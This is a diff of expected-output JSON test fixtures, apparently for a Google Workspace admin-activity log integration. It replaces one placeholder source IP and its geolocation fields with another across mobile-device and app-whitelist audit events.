+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"COMPANY_DEVICE_DELETION\",\"parameters\":[{\"name\":\"COMPANY_DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "deletion"
@@ -302,26 +282,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 2376,
+        "log.offset": 2371,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -342,7 +318,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"COMPANY_OWNED_DEVICE_UNBLOCKED\",\"parameters\":[{\"name\":\"COMPANY_DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"COMPANY_OWNED_DEVICE_UNBLOCKED\",\"parameters\":[{\"name\":\"COMPANY_DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -355,26 +331,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 2796,
+        "log.offset": 2790,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -395,7 +367,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"COMPANY_OWNED_DEVICE_WIPED\",\"parameters\":[{\"name\":\"COMPANY_DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"COMPANY_OWNED_DEVICE_WIPED\",\"parameters\":[{\"name\":\"COMPANY_DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -408,26 +380,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 3223,
+        "log.offset": 3216,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -448,7 +416,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_APPLICATION_PERMISSION_GRANT\",\"parameters\":[{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"DISTRIBUTION_ENTITY_NAME\",\"value\":\"ANY\"},{\"name\":\"DISTRIBUTION_ENTITY_TYPE\",\"value\":\"GROUP\"},{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"id\"},{\"name\":\"NEW_PERMISSION_GRANT_STATE\",\"value\":\"GRANTED\"},{\"name\":\"OLD_PERMISSION_GRANT_STATE\",\"value\":\"DENIED\"},{\"name\":\"PERMISSION_GROUP_NAME\",\"value\":\"LOCATION\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_APPLICATION_PERMISSION_GRANT\",\"parameters\":[{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"DISTRIBUTION_ENTITY_NAME\",\"value\":\"ANY\"},{\"name\":\"DISTRIBUTION_ENTITY_TYPE\",\"value\":\"GROUP\"},{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"id\"},{\"name\":\"NEW_PERMISSION_GRANT_STATE\",\"value\":\"GRANTED\"},{\"name\":\"OLD_PERMISSION_GRANT_STATE\",\"value\":\"DENIED\"},{\"name\":\"PERMISSION_GROUP_NAME\",\"value\":\"LOCATION\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -466,26 +434,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 3646,
+        "log.offset": 3638,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -506,7 +470,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_APPLICATION_PRIORITY_ORDER\",\"parameters\":[{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_APPLICATION_PRIORITY_ORDER\",\"parameters\":[{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -519,26 +483,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 4354,
+        "log.offset": 4345,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -559,7 +519,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"REMOVE_MOBILE_APPLICATION_FROM_WHITELIST\",\"parameters\":[{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"DISTRIBUTION_ENTITY_NAME\",\"value\":\"ANY\"},{\"name\":\"DISTRIBUTION_ENTITY_TYPE\",\"value\":\"ORG_UNIT\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"REMOVE_MOBILE_APPLICATION_FROM_WHITELIST\",\"parameters\":[{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"DISTRIBUTION_ENTITY_NAME\",\"value\":\"ANY\"},{\"name\":\"DISTRIBUTION_ENTITY_TYPE\",\"value\":\"ORG_UNIT\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -574,26 +534,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 4795,
+        "log.offset": 4785,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -615,7 +571,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_APPLICATION_SETTINGS\",\"parameters\":[{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"DISTRIBUTION_ENTITY_NAME\",\"value\":\"ANY\"},{\"name\":\"DISTRIBUTION_ENTITY_TYPE\",\"value\":\"ORG_UNIT\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_APPLICATION_SETTINGS\",\"parameters\":[{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"DISTRIBUTION_ENTITY_NAME\",\"value\":\"ANY\"},{\"name\":\"DISTRIBUTION_ENTITY_TYPE\",\"value\":\"ORG_UNIT\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -633,26 +589,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 5341,
+        "log.offset": 5330,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -673,7 +625,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ADD_MOBILE_APPLICATION_TO_WHITELIST\",\"parameters\":[{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"DISTRIBUTION_ENTITY_NAME\",\"value\":\"ANY\"},{\"name\":\"DISTRIBUTION_ENTITY_TYPE\",\"value\":\"ORG_UNIT\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ADD_MOBILE_APPLICATION_TO_WHITELIST\",\"parameters\":[{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"DISTRIBUTION_ENTITY_NAME\",\"value\":\"ANY\"},{\"name\":\"DISTRIBUTION_ENTITY_TYPE\",\"value\":\"ORG_UNIT\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -688,26 +640,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 5993,
+        "log.offset": 5981,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -728,7 +676,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_APPROVE\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_APPROVE\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -743,27 +691,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 6534,
+        "log.offset": 6521,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -787,7 +731,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_BLOCK\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_BLOCK\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -802,27 +746,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 6993,
+        "log.offset": 6979,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -846,7 +786,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_DELETE\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_DELETE\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "deletion",
@@ -861,27 +801,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 7450,
+        "log.offset": 7435,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
